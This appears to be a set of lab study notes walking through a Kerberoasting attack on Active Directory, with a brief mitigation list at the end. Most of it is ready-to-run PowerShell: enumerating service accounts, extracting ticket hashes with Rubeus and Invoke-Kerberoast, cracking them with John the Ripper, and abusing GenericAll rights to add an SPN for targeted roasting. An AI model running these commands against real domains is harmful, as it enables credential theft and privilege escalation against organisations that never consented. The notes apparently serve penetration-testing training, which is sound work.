kerberoasting
introduction
- get a TGS, need a valid domain user account
- get TGT from domain controller
- try to get a authentication hash
- try to crack that
walkthrough
# list potential targets
PS> Get-ADUser -Filter {ServicePrincipalName -ne "$null"} -Properties ServicePrincipalName
PS> Get-DomainUser -SPN
PS> C:\AD\Tools\Rubeus.exe kerberoast /user:serviceaccount /simple /rc4opsec /outfile:C:\AD\Tools\hashes.txt
PS> C:\AD\Tools\john-1.9.0-jumbo-1-win64\run\john.exe --wordlist=C:\AD\Tools\kerberoast\10k-worst-pass.txt C:\AD\Tools\hashes.txt
PS> . .\Invoke-Kerberoast.ps1
PS> Invoke-Kerberoast -Identity serviceaccountAdd serviceprincipalname to a user that we have genericall upon
PS> Find-InterestingDomainAcl -ResolveGUIDs | ?{$_.IdentityReferenceName -match "StudentUsers"}
PS> Get-ADUser -Identity support21user -PropertiesServicePrincipalName | select ServicePrincipalName
PS> Set-ADUser -Identity support21user -ServicePrincipalNames @{Add='us/myspn21'} -Verbose
# then kerberoast againWith PowerView.ps1:
PS> Set-DomainObject -Identity support1user -Set @{serviceprincipalname='us/myspnx'}
# then try to get a tgs- get kerberoasting ticket
- stealthy alternative: enumerate through LDAP
- crack kerberoasting ticket
- now I have a serice account → hopefully this is an admin account
migitation
- strong passwords
- least privilege